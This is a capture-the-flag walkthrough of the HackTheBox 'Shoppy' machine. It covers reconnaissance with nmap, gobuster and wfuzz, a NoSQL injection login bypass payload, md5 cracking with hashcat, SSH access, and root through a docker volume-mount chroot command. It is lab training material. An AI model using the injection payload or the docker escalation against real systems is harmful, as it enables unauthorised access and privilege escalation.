An investigation of nmap -sV -sC showed:
port 22: OpenSSH
port 80: ngingx 1.23.1: redirects to http://shoppy.htb
Let’s write the ip address of the machine and shoppy.htb, for display, in /etc/hosts.
Vhost via gobuster:
While we are scanning with nmap, we use gobuster to find potential subdomains and expand penetration opportunities.
gobuster vhost -w /home/hell59/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb
Manually explore the web application:
We examine manually the source code of the application.
We do not find anything but a timer.
Search for files and directories:
Let’s look for directories and files, maybe we’ll find something interesting.
wfuzz -c -z file,/hell59/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "http://shoppy.htb/FUZZ/"
We see that there is a /admin prefix through which we get to /login:
Looking at the authorization, we understand that this is a MongoDB NoSQL database.
We can log in using the following NoSQL injection logic:
You can read about NoSQL injections here: https://book.hacktricks.xyz/pentesting-web/nosql-injection .
admin'||'1==1 и получим список пользователей и хэш.
Use hashcat to crack the resulting md5 hash:
Let’s use hashcat with the rockyou.txt dictionary and look at the results:
Log in to the subdomain.
Now go to the subdomain mattermostafter adding it to /etc/hosts ,
http://www.mattermost.shoppy.htb with the obtained password.
Here is the user’s chat history, and we will find important information about the machine deploy:
Get the user flag:
With the received data, we log in via SSH, find the user.txt flag, and do cat user.txt.
If you dig around and pay attention to all the files in the password-manager, you can fish out and substitute the Sample password.
Thus, we get the username and password data:
Log in via SSH as deploy user.
Get the root flag:
We use the docker vulnerability described here: https://gtfobins.github.io/gtfobins/docker/ .
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Hooray, we got root!